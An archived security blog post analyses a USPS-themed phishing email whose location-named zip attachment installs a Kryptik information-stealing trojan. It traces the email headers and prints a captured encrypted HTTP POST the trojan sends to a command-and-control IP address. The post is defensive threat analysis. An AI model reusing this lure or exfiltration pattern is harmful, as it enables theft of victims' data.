This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

Targeted Malware Attacks Against USPS Customers Using Location in Malware Filename

A friend contacted me today with an interesting piece of malware he received in his inbox. A "delivery notification" stating that USPS couldn't make a delivery, and requesting you to download and print out the attached label to claim your package.

Screenshot of original email

What makes this malware interesting is that it is clearly targeted, in that the malware sender knows the city of the email recipient.  In this case, the malware was named USPS_Label_Hagerstown.zip.



Analysis of the email headers shows that the email originated from mail16.chariot.com.au.  Checking this server, it is not and open relay, so it's possible the mail server itself, or a system within the mail server's local network, was compromised.

Analysis of email headers

Inside the zip file, another file named USPS_Label_Hagerstown.exe - with an icon for a Microsoft Word document.

Virus Total shows a very low detection rate, some of which are only heuristic detections.

The file itself installs a trojan on the user's system. This trojan produces some interesting results when analyzed in a sandbox.

In short, the trojan looks at your web browsing history, then begins sending encrypted HTTP POST requests to a command & control server.

POST /460326245047F2B6E405E92260B09AA0E35D7CA2B1 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Host: 88.255.149.11
Content-Length: 308
Cache-Control: no-cache

\x80\x00\x00\x00Sy\xb2\xeat\xe0/\xd8\xfa6k:K\xf1\x9f\xaa&x\xaa\xd3\x7f\xaer\x96C\xf2N\xf0\xf6\xf7\x94\xd2T\xa7\xcd\xc7\xe13n\x92p}\x83\x04\x01\x00j\xee+\xef\x036\x1a\x90t\x87\xabO\xd6\x81N4 \x85>\xfcD\xddob\x90\x8f\x00\xe6\x1c\xde\xf55\xf0\xc3\x8e3
|\x88\xf0\xb9\x0f\x95m@$\x14\xe0\x84\xd80\xe1[\x1c\xf1\xd7\xa6\xdb\x9c\x19\x00w!\xb2\x11\x9cz\x8eh(\xf7\x939\x18\xdb\x83\xcb\xfe\x14Rm\x83\xac\x00\x00\x00\xa3"\xfa\xecO*\xd8\x93\xdf\x9b%w\xef\xc5\xd4\xa9{\x92\xfd\xfa\x13\x0c\x95\xe4\xc2k\x9a\xb6a\x99\x94\xae\x02VjJA\xb1\xebf\xf5f\x83\xd7\xb5bs\xa1?%\x12\x15\xd4
i\xbcMp\xf3 =\xfaT\xff\xd0a'\x9a\xbb\x07\x91\xb4\xffb\x1f>hR\x9d\x84Q\xe3\xa1~\xb5\xcd\xea$\xc9\xa0\xd1\\xd1,!\xc0\x97|$Qg\xfe\xa1E,\xfe@\xba\x97\x01\x98\xb9\xdd\xea\xbd\xf7;\x94\x87T3\x90\xc5juG\xc3\x93\xc8\x98\x19\xf7\xff@\xce\x11\x1f\x82\x96\xff\xa5\xc1\xfdW9"R\xce\x81t\x0e\xf7o\x96_\x92>\x0c\xf3Dp\xc5\xc7c
\xb4r\xaa\2\xba)
 The C&C server itself appears to be a compromised web host, most likely unknown to the server's owner.

According to ESET, the malware is a variant of the Kryptik family, which steals information and sensitive files from a system. This variant, Win32/Kryptik.CBJZ, has only been seen in the wild since 05/8/2014, and has an extremely low infection rate.

For those interested, I have posted a decompiled and disassembled version of the malware at my malware analysis lab.

Many thanks to David Malekar for sending me a sample of this malware to analyze.

If anyone has additional malware samples similar to this one, with a targeted location in the filename, please feel free to contact me at CaffSecBlog AT gmail.com, and I'll be happy to take a look at it.

No comments:

Post a Comment